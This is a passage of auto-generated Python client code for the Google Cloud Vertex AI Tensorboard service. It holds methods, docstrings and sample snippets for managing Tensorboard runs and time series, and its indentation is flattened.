gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
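    # Illustrative sketch: each CreateTensorboardRunRequest in ``requests`` must
    # use the same parent as the batch request (see the docstring above). All
    # names are placeholders.
    #
    #   parent = "projects/my-project/locations/us-central1/tensorboards/123/experiments/my-experiment"
    #   batch = client.batch_create_tensorboard_runs(
    #       parent=parent,
    #       requests=[
    #           aiplatform_v1.CreateTensorboardRunRequest(
    #               parent=parent,
    #               tensorboard_run=aiplatform_v1.TensorboardRun(display_name="trial 1"),
    #               tensorboard_run_id="trial-1",
    #           ),
    #       ],
    #   )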
def get_tensorboard_run(
self,
request: Optional[
Union[tensorboard_service.GetTensorboardRunRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_run.TensorboardRun:
r"""Gets a TensorboardRun.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_get_tensorboard_run():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.GetTensorboardRunRequest(
name="name_value",
)
# Make the request
response = client.get_tensorboard_run(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.GetTensorboardRunRequest, dict]):
The request object. Request message for
[TensorboardService.GetTensorboardRun][google.cloud.aiplatform.v1.TensorboardService.GetTensorboardRun].
name (str):
Required. The name of the TensorboardRun resource.
Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardRun:
TensorboardRun maps to a specific
execution of a training job with a given
set of hyperparameter values, model
                definition, dataset, etc.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.GetTensorboardRunRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.GetTensorboardRunRequest):
request = tensorboard_service.GetTensorboardRunRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_tensorboard_run]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def update_tensorboard_run(
self,
request: Optional[
Union[tensorboard_service.UpdateTensorboardRunRequest, dict]
] = None,
*,
tensorboard_run: Optional[gca_tensorboard_run.TensorboardRun] = None,
update_mask: Optional[field_mask_pb2.FieldMask] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_tensorboard_run.TensorboardRun:
r"""Updates a TensorboardRun.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_update_tensorboard_run():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
tensorboard_run = aiplatform_v1.TensorboardRun()
tensorboard_run.display_name = "display_name_value"
request = aiplatform_v1.UpdateTensorboardRunRequest(
tensorboard_run=tensorboard_run,
)
# Make the request
response = client.update_tensorboard_run(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.UpdateTensorboardRunRequest, dict]):
The request object. Request message for
[TensorboardService.UpdateTensorboardRun][google.cloud.aiplatform.v1.TensorboardService.UpdateTensorboardRun].
tensorboard_run (google.cloud.aiplatform_v1.types.TensorboardRun):
Required. The TensorboardRun's ``name`` field is used to
identify the TensorboardRun to be updated. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}``
This corresponds to the ``tensorboard_run`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. Field mask is used to specify the fields to be
overwritten in the TensorboardRun resource by the
update. The fields specified in the update_mask are
relative to the resource, not the full request. A field
is overwritten if it's in the mask. If the user does not
provide a mask then all fields are overwritten if new
values are specified.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardRun:
TensorboardRun maps to a specific
execution of a training job with a given
set of hyperparameter values, model
                definition, dataset, etc.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard_run, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.UpdateTensorboardRunRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.UpdateTensorboardRunRequest):
request = tensorboard_service.UpdateTensorboardRunRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard_run is not None:
request.tensorboard_run = tensorboard_run
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_tensorboard_run]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard_run.name", request.tensorboard_run.name),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
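    # Illustrative sketch: per-call ``retry`` and ``timeout`` overrides can be
    # passed alongside the flattened fields; the values and names below are
    # placeholders.
    #
    #   from google.api_core import retry as retries
    #   from google.protobuf import field_mask_pb2
    #
    #   updated_run = client.update_tensorboard_run(
    #       tensorboard_run=aiplatform_v1.TensorboardRun(
    #           name="projects/my-project/locations/us-central1/tensorboards/123/experiments/my-experiment/runs/trial-1",
    #           display_name="trial 1 (renamed)",
    #       ),
    #       update_mask=field_mask_pb2.FieldMask(paths=["display_name"]),
    #       retry=retries.Retry(),
    #       timeout=30.0,
    #   )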
def list_tensorboard_runs(
self,
request: Optional[
Union[tensorboard_service.ListTensorboardRunsRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTensorboardRunsPager:
r"""Lists TensorboardRuns in a Location.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_list_tensorboard_runs():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ListTensorboardRunsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_tensorboard_runs(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ListTensorboardRunsRequest, dict]):
The request object. Request message for
[TensorboardService.ListTensorboardRuns][google.cloud.aiplatform.v1.TensorboardService.ListTensorboardRuns].
parent (str):
Required. The resource name of the TensorboardExperiment
to list TensorboardRuns. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.services.tensorboard_service.pagers.ListTensorboardRunsPager:
Response message for
[TensorboardService.ListTensorboardRuns][google.cloud.aiplatform.v1.TensorboardService.ListTensorboardRuns].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ListTensorboardRunsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.ListTensorboardRunsRequest):
request = tensorboard_service.ListTensorboardRunsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_tensorboard_runs]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTensorboardRunsPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def delete_tensorboard_run(
self,
request: Optional[
Union[tensorboard_service.DeleteTensorboardRunRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gac_operation.Operation:
r"""Deletes a TensorboardRun.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_delete_tensorboard_run():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.DeleteTensorboardRunRequest(
name="name_value",
)
# Make the request
operation = client.delete_tensorboard_run(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.DeleteTensorboardRunRequest, dict]):
The request object. Request message for
[TensorboardService.DeleteTensorboardRun][google.cloud.aiplatform.v1.TensorboardService.DeleteTensorboardRun].
name (str):
Required. The name of the TensorboardRun to be deleted.
Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.DeleteTensorboardRunRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.DeleteTensorboardRunRequest):
request = tensorboard_service.DeleteTensorboardRunRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_tensorboard_run]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = gac_operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
def batch_create_tensorboard_time_series(
self,
request: Optional[
Union[tensorboard_service.BatchCreateTensorboardTimeSeriesRequest, dict]
] = None,
*,
parent: Optional[str] = None,
requests: Optional[
MutableSequence[tensorboard_service.CreateTensorboardTimeSeriesRequest]
] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.BatchCreateTensorboardTimeSeriesResponse:
r"""Batch create TensorboardTimeSeries that belong to a
TensorboardExperiment.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_batch_create_tensorboard_time_series():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
requests = aiplatform_v1.CreateTensorboardTimeSeriesRequest()
requests.parent = "parent_value"
requests.tensorboard_time_series.display_name = "display_name_value"
requests.tensorboard_time_series.value_type = "BLOB_SEQUENCE"
request = aiplatform_v1.BatchCreateTensorboardTimeSeriesRequest(
parent="parent_value",
requests=requests,
)
# Make the request
response = client.batch_create_tensorboard_time_series(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.BatchCreateTensorboardTimeSeriesRequest, dict]):
The request object. Request message for
[TensorboardService.BatchCreateTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.BatchCreateTensorboardTimeSeries].
parent (str):
Required. The resource name of the TensorboardExperiment
to create the TensorboardTimeSeries in. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
The TensorboardRuns referenced by the parent fields in
the CreateTensorboardTimeSeriesRequest messages must be
sub resources of this TensorboardExperiment.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
requests (MutableSequence[google.cloud.aiplatform_v1.types.CreateTensorboardTimeSeriesRequest]):
Required. The request message
specifying the TensorboardTimeSeries to
create. A maximum of 1000
TensorboardTimeSeries can be created in
a batch.
This corresponds to the ``requests`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.BatchCreateTensorboardTimeSeriesResponse:
Response message for
[TensorboardService.BatchCreateTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.BatchCreateTensorboardTimeSeries].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, requests])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.BatchCreateTensorboardTimeSeriesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.BatchCreateTensorboardTimeSeriesRequest
):
request = tensorboard_service.BatchCreateTensorboardTimeSeriesRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if requests is not None:
request.requests = requests
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.batch_create_tensorboard_time_series
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
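    # Illustrative sketch: the batch parent is a TensorboardExperiment, while each
    # nested request's parent is a run under that experiment; ``value_type`` uses
    # the TensorboardTimeSeries.ValueType enum. All names are placeholders.
    #
    #   experiment = "projects/my-project/locations/us-central1/tensorboards/123/experiments/my-experiment"
    #   response = client.batch_create_tensorboard_time_series(
    #       parent=experiment,
    #       requests=[
    #           aiplatform_v1.CreateTensorboardTimeSeriesRequest(
    #               parent=experiment + "/runs/trial-1",
    #               tensorboard_time_series=aiplatform_v1.TensorboardTimeSeries(
    #                   display_name="loss",
    #                   value_type=aiplatform_v1.TensorboardTimeSeries.ValueType.SCALAR,
    #               ),
    #           ),
    #       ],
    #   )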
def create_tensorboard_time_series(
self,
request: Optional[
Union[tensorboard_service.CreateTensorboardTimeSeriesRequest, dict]
] = None,
*,
parent: Optional[str] = None,
tensorboard_time_series: Optional[
gca_tensorboard_time_series.TensorboardTimeSeries
] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_tensorboard_time_series.TensorboardTimeSeries:
r"""Creates a TensorboardTimeSeries.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_create_tensorboard_time_series():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
tensorboard_time_series = aiplatform_v1.TensorboardTimeSeries()
tensorboard_time_series.display_name = "display_name_value"
tensorboard_time_series.value_type = "BLOB_SEQUENCE"
request = aiplatform_v1.CreateTensorboardTimeSeriesRequest(
parent="parent_value",
tensorboard_time_series=tensorboard_time_series,
)
# Make the request
response = client.create_tensorboard_time_series(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.CreateTensorboardTimeSeriesRequest, dict]):
The request object. Request message for
[TensorboardService.CreateTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.CreateTensorboardTimeSeries].
parent (str):
Required. The resource name of the TensorboardRun to
create the TensorboardTimeSeries in. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
tensorboard_time_series (google.cloud.aiplatform_v1.types.TensorboardTimeSeries):
Required. The TensorboardTimeSeries
to create.
This corresponds to the ``tensorboard_time_series`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardTimeSeries:
                TensorboardTimeSeries maps to time
                series produced in training runs
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, tensorboard_time_series])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.CreateTensorboardTimeSeriesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.CreateTensorboardTimeSeriesRequest
):
request = tensorboard_service.CreateTensorboardTimeSeriesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if tensorboard_time_series is not None:
request.tensorboard_time_series = tensorboard_time_series
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.create_tensorboard_time_series
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def get_tensorboard_time_series(
self,
request: Optional[
Union[tensorboard_service.GetTensorboardTimeSeriesRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_time_series.TensorboardTimeSeries:
r"""Gets a TensorboardTimeSeries.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_get_tensorboard_time_series():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.GetTensorboardTimeSeriesRequest(
name="name_value",
)
# Make the request
response = client.get_tensorboard_time_series(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.GetTensorboardTimeSeriesRequest, dict]):
The request object. Request message for
[TensorboardService.GetTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.GetTensorboardTimeSeries].
name (str):
Required. The name of the TensorboardTimeSeries
resource. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}/timeSeries/{time_series}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardTimeSeries:
                TensorboardTimeSeries maps to time
                series produced in training runs
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.GetTensorboardTimeSeriesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.GetTensorboardTimeSeriesRequest):
request = tensorboard_service.GetTensorboardTimeSeriesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.get_tensorboard_time_series
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def update_tensorboard_time_series(
self,
request: Optional[
Union[tensorboard_service.UpdateTensorboardTimeSeriesRequest, dict]
] = None,
*,
tensorboard_time_series: Optional[
gca_tensorboard_time_series.TensorboardTimeSeries
] = None,
update_mask: Optional[field_mask_pb2.FieldMask] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_tensorboard_time_series.TensorboardTimeSeries:
r"""Updates a TensorboardTimeSeries.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_update_tensorboard_time_series():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
tensorboard_time_series = aiplatform_v1.TensorboardTimeSeries()
tensorboard_time_series.display_name = "display_name_value"
tensorboard_time_series.value_type = "BLOB_SEQUENCE"
request = aiplatform_v1.UpdateTensorboardTimeSeriesRequest(
tensorboard_time_series=tensorboard_time_series,
)
# Make the request
response = client.update_tensorboard_time_series(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.UpdateTensorboardTimeSeriesRequest, dict]):
The request object. Request message for
[TensorboardService.UpdateTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.UpdateTensorboardTimeSeries].
tensorboard_time_series (google.cloud.aiplatform_v1.types.TensorboardTimeSeries):
Required. The TensorboardTimeSeries' ``name`` field is
used to identify the TensorboardTimeSeries to be
updated. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}/timeSeries/{time_series}``
This corresponds to the ``tensorboard_time_series`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. Field mask is used to specify the fields to be
overwritten in the TensorboardTimeSeries resource by the
update. The fields specified in the update_mask are
relative to the resource, not the full request. A field
is overwritten if it's in the mask. If the user does not
provide a mask then all fields are overwritten if new
values are specified.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardTimeSeries:
TensorboardTimeSeries maps to times
series produced in training runs
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard_time_series, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.UpdateTensorboardTimeSeriesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.UpdateTensorboardTimeSeriesRequest
):
request = tensorboard_service.UpdateTensorboardTimeSeriesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard_time_series is not None:
request.tensorboard_time_series = tensorboard_time_series
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.update_tensorboard_time_series
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(
(
"tensorboard_time_series.name",
request.tensorboard_time_series.name,
),
)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def list_tensorboard_time_series(
self,
request: Optional[
Union[tensorboard_service.ListTensorboardTimeSeriesRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTensorboardTimeSeriesPager:
r"""Lists TensorboardTimeSeries in a Location.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_list_tensorboard_time_series():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ListTensorboardTimeSeriesRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_tensorboard_time_series(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ListTensorboardTimeSeriesRequest, dict]):
The request object. Request message for
[TensorboardService.ListTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.ListTensorboardTimeSeries].
parent (str):
                Required. The resource name of the TensorboardRun to
                list TensorboardTimeSeries from. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.services.tensorboard_service.pagers.ListTensorboardTimeSeriesPager:
Response message for
[TensorboardService.ListTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.ListTensorboardTimeSeries].
